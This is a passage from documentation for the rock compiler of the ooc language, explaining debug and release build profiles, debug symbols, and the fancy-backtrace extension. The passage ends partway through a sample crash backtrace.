- Make the actual ejb invocation for CAF service from the creatEntity endpoint, to initiate a BPM process.
3. The BPM service is invoked from within a CAF service, through a web service.
4. BPM Process Instance ID is returned.
5. BPM Process instance id is further returned to OData producer.
6. OData response entity is created and returned to the OData Consumer
Exposing BPM as an OData endpoint
Depending on the NW version you have, you will be faced which of the solutions below to follow :
For versions 7.31 SP9 and above :
These versions come with default OData enablement of BPM and so they may be directly consumed.
For versions 7.31 SP8 and below :
For these versions there is no default OData support available and so we will do façade creation as follows:
- Create and fire an OData request, from OData consumer (may or may not be a web module for composing the OData request to act as OData consumer)
- Façade DC initiates BPM – Query parameters are extracted from OData request and used to initiate BPM process.
Few points about this Façade Development Component :
- Request is received at one of the exposed end-points (from within a web module, separately deployable as an enterprise DC).
- The web module has dependencies on the DC created as type of ‘External Library’, which consists of jar files from odata4j libarary. Also, the web module has created a namespace for OData request and also registered resource.
- Query parameters are extracted from the request payload.
- This web module initiates the BPM process, with help of BPM JAVA APIs.
3. The response is sent to OData producer.
4. OData response entity is created and returned to the OData Consumer.
Some additional points to be taken care of while making the solution work, could be with respect to cross origin request handling and authentication.
Conclusion :
Having performed the above steps creates a short, quick and yet a proper (hopefully!) solution to give OData enablement to your PO stack’s BPM & CAF, which then gives you the capability to consume services by any technology like javaScript, JAVA, dotNet etc.
Great blog, very interesting.
How about using Olingo Java library? I think right now it’s a prominent Java OData client/server API, possibly more than OData4J
What’s your take on it?
Thanks, regards
Vincenzo
Hi Vincenzo,
Thanks!
Even I have tried to answer the same question at my end, for projects in my organisation.
In one line: I believe Olingo is the better way to implement the facade layer to integrate with backend (CAF or otherwise).
Reasons why I believe (and a brief comparison) are as follows:
1. OData4J does not have any support or strong community to help you out. You have to invest a bit more on learning OData4J. Olingo is Apache’s library and has got support of SAP as well. It also seems to have a good community. With time, this should grow for Olingo and there are no signs of such support with OData4J.
2. If I am not wrong to quote(and if I remember correctly), OData4J will not have support for OData version 4, which will be supported by Olingo (clearly mentioned on the home page of Olingo). This brings to a stage where one will HAVE TO adopt Olingo sooner or later. So why not sooner!
These two are compelling advantages in favor of Apache Olingo, as they ensure support.
The only good thing, I personally like about OData4J is the way it registers classes for exposing as OData entities. One can use backend (CAF / Beans) classes to register when exposing as OData entities. Whereas, in Olingo, each variable of a class needs to be added as a property. This requires mirroring of the whole backend class in the facade layer (when using Olingo). Having said this, there is a easy way to bypass it by creating a little bit of a utitlity class (using Java Reflections) to do that manual work for us.
Hence, overall, I totally agree with you that Olingo should be used as the facade provider. | https://blogs.sap.com/2014/04/14/odata-endpoints-for-po-stack-bpm-caf-facade-way/ | CC-MAIN-2018-43 | refinedweb | 1,173 | 53.61 |
axes
An alternative implementation of d3's quantitative scales
Want to see pretty graphs? Log in now!Want to see pretty graphs? Log in now!
npm install axes
axes
An alternative to d3's quantitative scales that handles multiple axes a little more conveniently.
I've found that in larger d3 projects I tend to create a few duplicate scales across multiple charts, when really they'd be easier to manage/update them as a group: being passed around into each chart as required, responding to updates being made in other parts of the code.
Installation
$ npm install --save axes
Example
var linedata = require('./linedata.json') var bardata = require('./bardata.json') var d3 = require('d3') var axes = require('axes')() .def('barX') .domain([0, bardata.length]) .def('barY') .domain([0, d3.max(bardata)]) .def('lineX') .domain([0, linedata.length]) .def('lineY') .domain([0, d3.max(linedata)]) .root() // Alias your scales so they play nice // with the code you're giving it. axes.barX(2) // 0.5 axes.alias({ x: 'barX' }).x(2) // 0.5 // Throw them into your charts require('./barchart')({ axes: axes.alias({ x: 'barX' , y: 'barY' }) }) require('./linechart')({ axes: axes.alias({ x: 'lineX' , x: 'lineY' }) }) // Use `axis.map` for alternative value // mappings. var angle = axes.barX.map(function(n) { return n.value * Math.PI * 2 }) angle({ value: 2 }) // 3.14159265...
API
axis = require('axes').def()
Returns an anonymous scale, which is very similar to
d3.scale.linear, but a
more limited API.
axis.domain([domain])
Takes an 2-element array defining the minimum and maximum input values for the scale.
axis.range([range])
Takes an 2-element array defining the minimum and maximum output values for the scale.
axis()
Returns a number between
range[0] and
range[1] depending on how far it is
between
domain[0] and
domain[1].
axis.on('update', handler(key))
The "update" event is called on
handler every time the axis'
range or
domain properties are updated.
axis.copy()
Creates a copy of the axis, so that you can change its
domain and
range
values without altering the original one.
scale = axis.map([map])
Returns a scale that maps its output according to
map. The initial value will
be scaled based on
axis's output. You can update these values in the
original scale and the scale's range will update accordingly too.
scale()
The returned scale essentially boils down to:
axis().map(mapper)(n) === mapper(axis(n))
axes = require('axes')()
Returns a new group of axes.
member = axes.def(name)
Returns a named scale, attached to this group.
member.root()
Returns the group of axes.
member[fork|alias|def]()
The
fork,
alias and
def methods on each group member will be called from
the group, to make for easier chaining.
axes.fork(new, old)
Creates a copy of the group's member called
old, called
new.
axes.alias(map)
Returns a copy of the group, while preserving the original references to each
member.
map is an object: the keys determine the new name, and the values
determine the old one.
var axes = require('axes')() .def('oldX') .range([0, 100]) var aliased = axes.alias({ oldX: 'newX' }) axes.oldX(0.5) // 50 aliased.newX(0.5) // 50 aliased.oldX(0.5) // Object #<Object> has no method 'oldX'
axes.copy()
Copies the whole group, copying each member reference as well so you can make can changes to this copy without having to worry about altering the other scales. | https://www.npmjs.org/package/axes | CC-MAIN-2014-15 | refinedweb | 572 | 61.02 |
New firmware for the Slampher
Some.
There are a number of reviews of the Slampher that focus in the basic usage or that go more in depth tearing it apart or flashing custom firmware. As you can guess, I’m more interested in the later. I already exposed my reasons in my post about the S20 Smart Socket and this week it has become more apparent as a report from Bitdefender has uncovered a bug on a commercially available smart socket that would allow attackers to create a malicious botnet. An army of owned sockets!
We are only a few days away from the arrival of the ESP32 and the ESP6288 is still one of the kings of the IoT block, and a really a successful one. Itead choice of using Espressif chips on their home automation line of products make them a hackers dream.
There are a few firmware projects available that will work on the Slampher, including my Espurna Firmware. Most of them have MQTT support and a web configuration portal. Some, like the Espurna, are light enough to support OTA with the 1Mb flash memory that the Sonoff or the Slampher have.
GPIO0 problem
The Slampher and the Sonoff RF both have a 8bit EFM8BB10F2G-A-QFN20 microcontroller (from the EFM8 Busy Bee family) by Silabs that listens to the radio module messages and handles the on-board button. That button is tied to GPIO0 in the Sonoff TH or the S20 Smart Socket and it can be used to enter into flash mode upon boot. Same things does not happen on the Slampher.
The EFM8BB1 intercepts the button events so it can enter into “pairing mode” when the user double-clicks the button. In pairing mode it listens and stores a new radio code that will become the code to toggle on and off the switch from then on. But the curious thing is that if there is a single click event it just pulls down GPIO0 in the ESP8266 like the the button does in the non-RF versions. So Sonoff firmware will work just the same except for:
- You cannot use the button to enter flash mode in the ESP8266 (since it’s a user firmware event that pulls GPIO0 down and no user firmware is running at boot time).
- You can’t use double click events on your firmware because these are intercepted by the EFM8BB1, unless they are more than about half a second away from each other.
- You can’t use long click events since the EFM8BB1 pulls GPIO0 down only on button release for about 125ms.
Issues #2 and #3 you will have to live with them. My Espurna firmware uses double click and long click events to enter AP mode and to reset the board respectively. That will not work on the Slampher. I could extend the double click interval in the DebounceEvent library from 500ms to 1000ms, but it won’t be very user friendly.
Issue #1 has different solutions. Scargill suggests to move resistor R21 to R20, so the button is now attached to ESP8266 GPIO0 (check the schematic at Itead wiki). Problem is that you lose the ability to pair your remote. Off course you could pair it first and then move the resistor but chances are that in the long run you will need to pair it more often than flash it, because you have OTA.
Flashing the Slampher.
Off course I’m assuming you have a stable OTA-able firmware and that you have a testing platform (I have a Sonoff just for that). Also, you can add a new button between the pad and GND to flash the device in a more comfortable way..
Radio control
The radio receiver chip is a SYN470R by Synoxo in a 16 pin SOP package. This is a ASK/OOK RF transparent link (an “antenna-in to data-out” as the manufacturer says). It needs a microncontroller to act as a logic decoder. You can configure the bandwidth and it has a WAKEUP pin you can use to wake up your controller when there is a radio signal.
First I tried to pair it with my Avidsen remote without success. Then I used another remote I have for Noru radio sockets and it worked! Kind of… The red LED in the radio modules blinked while pairing it but not all the buttons worked. Only ON1, OFF2, OFF3 and 8H buttons on my Noru remote actually work with the Slampher. Weird.
Decoding the radio signals
So I reviewed my own post about decoding radio signals but instead of using my Bus Pirate I give it a try to the RCSwitch library first, using the basic receiver example and adding some code to output “normalized” data strings, I started decoding the 4 buttons of the remote Itead is selling. This is the code I used:
#include <RCSwitch.h>; RCSwitch mySwitch = RCSwitch(); void setup() { Serial.begin(115200);.print( mySwitch.getReceivedProtocol() ); char binary[25] = {0}; char tristate[13] = {0}; int count = 0; int tri = 0; unsigned int * timings = mySwitch.getReceivedRawdata(); for (int i=1; i<49; i=i+2) { binary[count++] = (timings[i] > 500) ? '1':'0'; if (count % 2 == 0) { if (binary[count-2] == '0') { tristate[tri++] = (binary[count-1] == '0') ? '0' : 'F'; } else { tristate[tri++] = (binary[count-1] == '0') ? 'X' : '1'; } } } Serial.print(" Binary: ); Serial.print(binary); Serial.print(" Tristate: ); Serial.println(tristate); } mySwitch.resetAvailable(); } }
The output of the 4 buttons from the Itead remote is:
As you can see they are 24 bit messages where the first 20 are the same for the 4 buttons and then there is only one bit set for the remaining 4 bits. The 4 buttons in the Noru remote that work have only 1 bit set in the last 4. That’s why the remote Itead sells has only 4 buttons. I still don’t know if I can use Itead’s remote with the Noru sockets since I never managed to know the relation between button codes (between ON and OFF buttons that control the same socket). But they don’t look compatible…
Note: one funny thing is that there is another EFM8BB1 microcontroller on the radio module. What? Maybe the radio decoding is done in this second chip while the one in the Slampher board is just responsible for the button and the GPIO0?
Wrapping up
The Slampher might be a bit bulky and it won’t fit in all the lamps (it does protrude from the livingroom lamp cover at home) but it’s a fine device for home automation. My criticism to the eWeLink app and my concerns about really owning the device still stand. But I will no doubt tell you: go buy one, flash it with your own firmware and enjoy.
"New firmware for the Slampher" was first posted on 23 August 2016 by Xose Pérez on tinkerman.cat under. | https://tinkerman.cat/post/new-firmware-for-the-slampher | CC-MAIN-2019-22 | refinedweb | 1,153 | 69.11 |
Object Pooling in Unity
In this tutorial, you’ll learn how to create your own object pooler in Unity in a fun 2D shooter.
In this scenario, you’re outnumbered 1000 to 1. There’s no need to give the Neptunians the upper hand with unexpected memory spikes. Sound familiar? Go ahead and pull up a chair and get up to speed on Object Pooling.
In this Unity tutorial, you’ll learn:
- All about object pooling
- How to pool a game object
- How to expand your object pool at runtime if necessary
- How to extend your object pool to accommodate different objects
By the end of this tutorial, you’ll have a generic script you can readily drop into a new game. Additionally, you’ll understand how to retrofit the same script for an existing game.
Prerequisites: You’ll need to be familiar with some basic C# and how to work within Unity’s development environment. If you need some assistance getting up to speed, check out the Unity tutorials on this site.
What is Object Pooling?
Instantiate() and
Destroy() are useful and necessary methods during gameplay. Each generally requires minimal CPU time.
However, for objects created during gameplay that have a short lifespan and get destroyed in vast numbers per second, the CPU needs to allocate considerably more time.
Bullets are a great example of a GameObject that you might pool.
Additionally, Unity uses Garbage Collection to deallocate memory that’s no longer in use. Repeated calls to
Destroy() frequently trigger this task, and it has a knack for slowing down CPUs and introducing pauses to gameplay.
This behavior is critical in resource-constrained environments such as mobile devices and web builds.
Object pooling is where you pre-instantiate all the objects you’ll need at any specific moment before gameplay — for instance, during a loading screen. Instead of creating new objects and destroying old ones during gameplay, your game reuses objects from a “pool”.
Getting Started
If you don’t already have Unity 5 or newer, download it from Unity’s website.
Download the starter project, unzip and open
SuperRetroShooter_Starter project in Unity — it’s a pre-built vertical scroll shooter.
Note: Credit goes to Master484, Marcus, Luis Zuno and Skorpio for the medley of art assets from OpenGameArt. The royalty-free music was from the excellent Bensound.
Feel free to have a look at some of the scripts, such as Barrier; they are generic and useful, but their explanations are beyond the scope of this tutorial.
As you work through everything, it will be helpful to see what’s happening in your game’s Hierarchy during gameplay. Therefore, I recommend that you deselect Maximize on Play in the Game Tab’s toolbar.
Click the play button to see what you have. :]
Note how there are many
PlayerBullet(Clone) objects instantiated in the Hierarchy when shooting. Once they hit an enemy or leave the screen, they are destroyed.
Making matters worse is the act of collecting those randomly dropped power-ups; they fill the game’s Hierarchy with bullet clones with just a few shots and destroy them all the very next second.
In its current state, Super Retro Shooter is a “bad memory citizen”, but you’ll be the hero that gets this shooter firing on all cylinders and using resources more scrupulously.
Time to Get Your Feet Wet
Click on the Game Controller GameObject in the Hierarchy. Since this object will persist in the Scene, you’ll add your object pooler script here.
In the Inspector, click the Add Component button, and select New C# Script. Give it the name ObjectPooler.
Double-click the new script to open it in MonoDevelop, and add the following code to the class:
public static ObjectPooler SharedInstance; void Awake() { SharedInstance = this; }
Several scripts will need to access the object pool during gameplay, and
public static instance allows other scripts to access it without getting a Component from a GameObject.
At the top of the script, add the following
using statement:
using System.Collections.Generic;
You’ll be
using a generic list to store your pooled objects. This statement gives you access to generic data structures so that you can use the
List class in your script.
Note: Generic? Nobody wants to be generic! Everybody wants to be special!
In a programming language like C#, generics allow you to write code that can be used by many different types while still enforcing type safety.
Typically, you use generics when working with collections. This approach allows you to have an array that only allows one type of object, preventing you from putting a dog inside a cat array, although that could be pretty funny. :]
Speaking of lists, add the object pool list and two new public variables:
public List<GameObject> pooledObjects; public GameObject objectToPool; public int amountToPool;
The naming is fairly self-explanatory.
By using the Inspector in Unity, you’ll be able to specify a GameObject to pool and a number to pre-instantiate. You’ll do that in a minute.
Meanwhile, add this code to Start():
pooledObjects = new List<GameObject>(); for (int i = 0; i < amountToPool; i++) { GameObject obj = (GameObject)Instantiate(objectToPool); obj.SetActive(false); pooledObjects.Add(obj); }
The
for loop will instantiate the
objectToPool GameObject the specified number of times in
numberToPool. Then the GameObjects are set to an inactive state before adding them to the
pooledObjects list.
Go back to Unity and add the Player Bullet Prefab to the objectToPool variable in the Inspector. In the numberToPool field, type 20.
Run the game again. You should now have 20 pre-instantiated bullets in the Scene with nowhere to go.
Well done! You now have an object pool. :]
Dipping into the Object Pool
Jump back into the ObjectPooler script and add the following new method:
public GameObject GetPooledObject() { //1 for (int i = 0; i < pooledObjects.Count; i++) { //2 if (!pooledObjects[i].activeInHierarchy) { return pooledObjects[i]; } } //3 return null; }
The first thing to note is that this method has a
GameObject return type as opposed to
void. This means a script can ask for a pooled object from
GetPooledObject and it'll be able to return a GameObject in response. Here's what else is happening here:
- This method uses a
forloop to iterate through your
pooledObjectslist.
- You check to see if the item in your list is not currently active in the Scene. If it is, the loop moves to the next object in the list. If not, you exit the method and hand the inactive object to the method that called
GetPooledObject.
- If there are currently no inactive objects, you exit the method and return nothing.
Now that you can ask the pool for an object, you need to replace your bullet instantiation and destroy code to use the object pool instead.
Player bullets are instantiated in two methods in the
ShipController script.
Shoot()
ActivateScatterShotTurret()
Open the ShipController script in MonoDevelop and find the lines:
Instantiate(playerBullet, turret.transform.position, turret.transform.rotation);
Replace both instances with the following code:
GameObject bullet = ObjectPooler.SharedInstance.GetPooledObject(); if (bullet != null) { bullet.transform.position = turret.transform.position; bullet.transform.rotation = turret.transform.rotation; bullet.SetActive(true); }
Note: Make sure this replacement is made in both
Shoot() and
ActivateScatterShotTurret() before you continue.
Previously, the methods iterated through the list of currently active turrets on the player's ship (depending on power-ups) and instantiated a player bullet at the turrets position and rotation.
You've set it to ask your
ObjectPooler script for a pooled object. If one is available, it's set to the position and rotation of the turret as before, and then set to
active to rain down fire upon your enemy. :]
Get Back in the Pool
Instead of destroying bullets when they're no longer required, you'll return them to the pool.
There are two methods that destroy unneeded player bullets:
OnTriggerExit2D()in the
DestroyByBoundaryscript removes the bullet when it leaves the screen.
OnTriggerEnter2D()in the
EnemyDroneControllerscript removes the bullet when it collides and destroys an enemy.
Open DestroyByBoundary in MonoDevelop and replace the contents of the
OnTriggerExit2D method with this code:
if (other.gameObject.tag == "Boundary") { if (gameObject.tag == "Player Bullet") { gameObject.SetActive(false); } else { Destroy(gameObject); } }
Here's a generic script that you can attach to any number of objects that need removal when they leave the screen. You check if the object that triggered the collision has the
Player Bullet tag -- if yes, you set the object to inactive instead of destroying it.
Similarly, open EnemyDroneController and find
OnTriggerEnter2D(). Replace
Destroy(other.gameObject); with this line of code:
other.gameObject.SetActive(false);
Wait!
Yes, I can see you hovering over the play button. After all that coding, you must be itching to check out your new object pooler. Don't do it yet! There is one more script to modify -- don't worry, it's a tiny change. :]
Open the BasicMovement script in MonoDevelop and rename the
Start Method to
OnEnable.
One gotcha when you use the object pool pattern is remembering that the lifecycle of your pooled object is a little different.
Ok, now click play. :]
As you shoot, the inactive player bullet clones in the Hierarchy become active. Then they elegantly return to an inactive state as they leave the screen or destroy an enemy drone.
Well Done!
But what happens when you collect all those power-ups?
Running out of ammo eh?
As the game designer, you enjoy supreme powers, such as limiting players' firepower to encourage a more focused strategy as opposed to just shooting everything and everywhere.
You could exert your powers to do this by adjusting the number of bullets you initially pool to get this effect.
Conversely, you can also go in the other direction pool a huge number of bullets to cover all power-up scenarios. That begs a question: why would you pool 100 bullets for the elusive ultimate power-up when 90 percent of the time 50 bullets is adequate?
You would have 50 bullets in memory that you would only need rarely.
The Incredible Expanding Object Pool
Now you'll modify the object pool so you can opt to increase the number of pooled objects at runtime if needed.
Open the ObjectPooler script in MonoDevelop and add this new public variable:
public bool shouldExpand = true;
This code creates a checkbox in the Inspector to indicate whether it's possible to increase the number of pooled objects.
In
GetPooledObject(), replace the line
return null; with the following code.
if (shouldExpand) { GameObject obj = (GameObject)Instantiate(objectToPool); obj.SetActive(false); pooledObjects.Add(obj); return obj; } else { return null; }
If a player bullet is requested from the pool and no inactive ones can be found, this block checks to see it's possible to expand the pool instead of exiting the method. If so, you instantiate a new bullet, set it to inactive, add it to the pool and return it to the method that requested it.
Click play in Unity and try it out. Grab some power-ups and go crazy. Your 20 bullet object pool will expand as needed.
Object Pool Party
Invariably, lots of bullets mean lots of enemies, lots of explosions, lots of enemy bullets and so on.
To prepare for the onslaught of madness, you'll extend the object pooler so it handles multiple object types. You'll take it a step further and will make it possible to configure each type individually from one place in the Inspector.
Add the following code above the ObjectPooler class:
[System.Serializable] public class ObjectPoolItem { }
[System.Serializable] allows you to make instances of this class editable from within the Inspector.
Next, you need to move the variables
objectToPool,
amountToPool and
shouldExpand into the new
ObjectPoolItem class. Heads up: you'll introduce some errors in the ObjectPooler class during the move, but you'll fix those in a minute.
Update the
ObjectPoolItem class so it looks like this:
[System.Serializable] public class ObjectPoolItem { public int amountToPool; public GameObject objectToPool; public bool shouldExpand; }
Any instance of
ObjectPoolItem can now specify its own data set and behavior.
Once you've added the above public variables, you need make sure to delete those variables from the
ObjectPooler. Add the following to
ObjectPooler:
public List<ObjectPoolItem> itemsToPool;
This is new list variable that lets you hold the instances of
ObjectPoolItem.
Next you need to adjust
Start() of
ObjectPooler to ensure all instances of
ObjectPoolItem get onto your pool list. Amend
Start() so it looks like the code below:
void Start () { pooledObjects = new List<GameObject>(); foreach (ObjectPoolItem item in itemsToPool) { for (int i = 0; i < item.amountToPool; i++) { GameObject obj = (GameObject)Instantiate(item.objectToPool); obj.SetActive(false); pooledObjects.Add(obj); } } }
In here, you added a new
foreach loop to iterate through all instances of ObjectPoolItem and add the appropriate objects to your object pool.
You might be wondering how to request a particular object from the object pool – sometimes you need a bullet and sometimes you need more Neptunians, you know?
Tweak the code in
GetPooledObject so it matches the following:
public GameObject GetPooledObject(string tag) { for (int i = 0; i < pooledObjects.Count; i++) { if (!pooledObjects[i].activeInHierarchy && pooledObjects[i].tag == tag) { return pooledObjects[i]; } } foreach (ObjectPoolItem item in itemsToPool) { if (item.objectToPool.tag == tag) { if (item.shouldExpand) { GameObject obj = (GameObject)Instantiate(item.objectToPool); obj.SetActive(false); pooledObjects.Add(obj); return obj; } } } return null; }
GetPooledObject now takes a
string parameter so your game can request an object by its
tag. The method will search the object pool for an inactive object that has a matching tag, and then it returns an eligible object.
Additionally, if it finds no appropriate object, it checks the relevant
ObjectPoolItem instance by the tag to see if it's possible to expand it.
Add the Tags
Get this working with bullets first, then you can add additional objects.
Reopen the ShipController script in MonoDevelop. In both
Shoot() and
ActivateScatterShotTurret(), look for the line:
GameObject bullet = ObjectPooler.SharedInstance.GetPooledObject();
Append the code so that it includes the
Player Bullet tag parameter.
GameObject bullet = ObjectPooler.SharedInstance.GetPooledObject(“Player Bullet”);
Return to Unity and click on the GameController object to open it in the Inspector.
Add one item to the new ItemsToPool list and populate it with 20 player bullets.
Click Play to make sure all that extra work changed nothing at all. :]
Good! Now you're ready to add some new objects to your object pooler.
Change the size of ItemsToPool to three and add the two types of enemy ships. Configure the ItemsToPool instances as follows:
Element 1:
Object to Pool: EnemyDroneType1
Amount To Pool: 6
Should Expand: Unchecked
Element 2
Object to Pool: EnemyDroneType2
Amount to Pool: 6
Should Expand: Unchecked
As you did for the bullets, you need to change the
instantiate and
destroy methods for both types of ships.
The enemy drones are instantiated in the
GameController script and destroyed in the
EnemyDroneController script.
You've done this already, so the next few steps will go a little faster. :]
Open the GameController script. In SpawnEnemyWaves(), find the enemyType1 instantiation code:
Instantiate(enemyType1, spawnPosition, spawnRotation);
And replace it with the following code:
GameObject enemy1 = ObjectPooler.SharedInstance.GetPooledObject("Enemy Ship 1"); if (enemy1 != null) { enemy1.transform.position = spawnPosition; enemy1.transform.rotation = spawnRotation; enemy1.SetActive(true); }
Find this enemyType2 instantiation code:
Instantiate(enemyType2, spawnPosition, spawnRotation);
Replace it with:
GameObject enemy2 = ObjectPooler.SharedInstance.GetPooledObject("Enemy Ship 2"); if (enemy2 != null) { enemy2.transform.position = spawnPosition; enemy2.transform.rotation = spawnRotation; enemy2.SetActive(true); }
Finally, open the EnemyDroneController script. Currently,
OnTriggerExit2D() just destroys the enemy ship when it leaves the screen. What a waste!
Find the line of code:
Destroy(gameObject);
Replace it with the code below to ensure the enemy goes back to the object pool:
gameObject.SetActive(false);
Similarly, in
OnTriggerEnter2D(), the enemy is destroyed when it hits a player bullet. Again, find Destroy():
Destroy(gameObject);
And replace it with the following:
gameObject.SetActive(false);
Hit the play button and watch as all of your instantiated bullets and enemies change from inactive to active and back again as and when they appear on screen.
Elon Musk would be envious your reusable space ships!
Where to go From Here?
Thank you for taking the time to work through this tutorial. Here's a link to the Completed Project.
In this tutorial, you retrofitted an existing game with object pooling to save your users' CPUs from a near-certain overload and the associated consquences of frame skipping and battery burning.
You also got very comfortable jumping between scripts to connect all the pieces together.
If you want to learn more about object pooling, check out Unity's live training on the subject.
I hope you found this tutorial useful! I'd love to know how it helped you develop something cool or take an app to the next level.
Feel free to share a link to your work in the comments. Questions, thoughts or improvements are welcome too! I look forward to chatting with you about object pooling, Unity and destroying all the aliens. | https://www.raywenderlich.com/847-object-pooling-in-unity | CC-MAIN-2021-17 | refinedweb | 2,843 | 55.84 |
User Details
- User Since
- Oct 14 2014, 7:04 AM (347 w, 4 d)
Oct 21 2020
Oct 20 2020
Oct 5 2020
Do you mean to improve the existing LLVM Jump Threading pass?
Yes, either improve current one or write new more powerful JT pass.
Sep 25 2020
This patch is not supposed to be used as is. It can be used for experiments and as a proof of concept. A version for reviewing will be submitted soon.
Sep 16 2020
Feb 15 2019
Jan 16 2019
Hi George,
Jan 15 2019
Nov 23 2018
+1, LGTM
I'd like someone from the X86 world to approve this as well.
Nov 21 2018
Hi Jonas,
Oct 31 2018
Hi Jonas,
May 14 2018
May 11 2018
We might need to play with _GLIBCXX_USE_CXX11_ABI=0 and the -Wabi-tag option to mitigate libstdc++ ABI issues.
Feb 27 2018
Sanjay,
Maybe it's worth to send the API change to llvm-dev as RFC?
Feb 21 2018
Just validated that it has fixed the issue.
Thank you, Peter.
Hi Peter,
Hi Sanjay,
Feb 20 2018
Hi Sanjay,
Feb 8 2018
Ping
Jan 31 2018
Ping
Jan 30 2018
Hi Eli,
Jan 24 2018
Hi Peter,
Jan 23 2018
Jan 22 2018
Jan 19 2018
Hi Joel,
Jan 18 2018
Thank you, Joel. The function to look at is make_list.
In SingleSource/Benchmarks/McGill/chomp the patch causes generation of subs+cmp_with_0 instead of only a subs.
The patch caused regressions in LNT benchmarks on Cortex-A9:
Jan 17 2018
Hi Sergey and Sanjoy,
Jan 16 2018
A reproducer:
Jan 15 2018
Jan 12 2018
I have found that the patch also caused 7.31% regression in SPEC2k6 401.bzip2 on Cortex-A57 (AArch64).
Jan 11 2018
Sergey,
Thank you for the initial analysis. I'll try to debug SCEV.
Jan 10 2018
Hi Sergey,
Jan 9 2018
The patch looks OK to me if using std::to_string is allowed now.
Dec 18 2017
Hi Shahid,
Dec 15 2017
Dec 14 2017
Hi Shahid,
Dec 5 2017
$ llc -O3 test_crash.ll llc: /home/llvm-test/tmp/llvm/lib/CodeGen/SelectionDAG/LegalizeDAG.cpp:1002: void (anonymous namespace)::SelectionDAGLegalize::LegalizeOp(llvm::SDNode *): Assertion `(TLI.getTypeAction(*DAG.getContext(), Op.getValueType()) == TargetLowering::TypeLegal || TLI.isTypeLegal(Op.getValueType()) || Op.getOpcode() == ISD::TargetConstant || Op.getOpcode() == ISD::Register) && "Unexpected illegal type!"' failed. ...
Hi Nirav,
Dec 4 2017
Dec 1 2017
There are stability and correctness issues on AArch64. The similar issues might exist on other ARM targets. Could you please disable MergeConsecutiveStores for all ARM targets including AArch64?
These changes caused failures of AArch64 NEON Emperor tests.
These changes caused Clang to crash when it compiled spec2006 403.gcc for AArch64. I am working on a reproducer.
LGTM
Nov 30 2017
A reproducer:
Nov 29 2017
Hi Nirav,
Nov 28 2017
Nov 22 2017
@evgeny777: I'll try to find some time to look at 401.bzip2.
Nov 9 2017
Nov 8 2017
I've got Spec2006 results for Cortex-A57:
Nov 3 2017
Cortex-A57 results from another private benchmark (50 sub-benchmarks):
I've got first results of benchmark runs: the LNT test suite + a private benchmark 01. I used the latest patch.
The configuration is a Juno board Cortex-A57/A53, v8-a, AArch32, Thumb2.
Options: -O3 -mcpu=cortex-a57 -mthumb -fomit-frame-pointer
The runs passed without errors.
Oct 31 2017
I'll do AArch32/AArch64 benchmarks runs on our Juno boards. It would be worth to run CTMark to check compilation time.
Oct 27 2017
Hi Max,
Hi Max,
Oct 26 2017
I attached
The benchmark source file:
Hi,
This patch caused SingleSource/Benchmarks/Shootout/shootout-sieve regression on Arm public bots:
Oct 14 2017
The patch has caused a few regressions on Arm too. They are within 5%. We investigated some of them. For example, the unrolling is not applied. However the unrolling could figure out that some non-free GEPs are removed during optimisation. Maybe other passes have the similar problem. We currently need more precise cost model for inlining at Oz. However we started looking at the recently introduced TTI code size cost if we can use it.
At which optimisation level is the inlining affected? Could we fix the issues by updating the heuristics?
Oct 5 2017
Thank you, Justin.
Oct 4 2017
Hi Justin,
Oct 3 2017
Thank you, Jun, for fixing this.
There is PR33642 with a test case when TCC_FREE is returned for non-cost free GEPs.
Thank you, Eli.
Oct 2 2017
Ping
Sep 26 2017
Sep 25 2017
Sep 1 2017
Thank you, Renato, for clarifying that.
LGTM.
BTW the issue was found during porting micropython for Cortex-M0 from GCC to Clang.
Aug 25 2017
As this patch can affect ARM targets I am doing some benchmarking.
I've got the LNT benchmarks results for AArch64 (Cortex-A57). There is no difference in performance. I'll have got more results soon.
It's interesting to see what benchmarks has been used to measure the improvements.
LGTM
Thank you, Haicheng.
Aug 24 2017
Thank you, Eli. | https://reviews.llvm.org/p/eastig/ | CC-MAIN-2021-25 | refinedweb | 851 | 75.61 |
Intro
Debugging applications is a natural cycle of writing software. One simply cannot anticipate every single problem they are going to run into while using an piece of software.
For rock, since we compile to C, we can use traditional debugging tools like gdb, and the next few sections explain exactly how.
Debug symbols
By default, rock compiles in the debug profile. The corresponding command line
option is
-pg.
Not only will this pass the corresponding option to the C compiler used (gcc, clang, etc.) but it will also:
- Add
#linedirectives for debuggers to map back to .ooc files
- Keep produced C files around for further inspection.
- On Linux, it’ll add -rdynamic so that all symbols are exported
- On OSX, it’ll run dsymutil so that a
.dSYMarchive will be produced, containing debug symbols.
When releasing a production build of your software, use the release profile instead, using:
rock -pr
This will omit debug symbols.
Fancy backtraces
While the next sections cover using a debugger, which is a prerequisite for pretty much all hardcore problem-solving sections, there is a way to get information about program crashes without using a debugger.
The fancy-backtrace rock extension produces output like this when a program crashes:
[OutOfBoundsException in ArrayList]: Trying to access an element at offset 0, but size is only 0! [fancy backtrace] 0 fancy_backtrace.c (from C:\msys64\home\amwenger\Dev\rock\bin\fancy_backtrace.DLL) 1 BacktraceHandler backtrace_impl() in lang/Backtrace (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Backtrace.ooc:50) 2 BacktraceHandler backtrace() in lang/Backtrace (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Backtrace.ooc:243) 3 Exception addBacktrace_impl() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:108) 4 Exception addBacktrace() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:212) 5 Exception throw_impl() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:177) 6 Exception throw() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:232) 7 ArrayList get_impl() in structs/ArrayList (at C:/msys64/home/amwenger/Dev/rock/sdk/structs/ArrayList.ooc:82) 8 ArrayList get() in structs/ArrayList (at C:/msys64/home/amwenger/Dev/rock/sdk/structs/ArrayList.ooc:40) 9 __OP_IDX_ArrayList_Int__T() in structs/ArrayList (at C:/msys64/home/amwenger/Dev/rock/sdk/structs/ArrayList.ooc:290) 10 foo() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:32) 11 bar() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:41) 12 App runToo_impl() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:72) 13 App runToo() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:84) 14 __crash_closure403() in crash (at 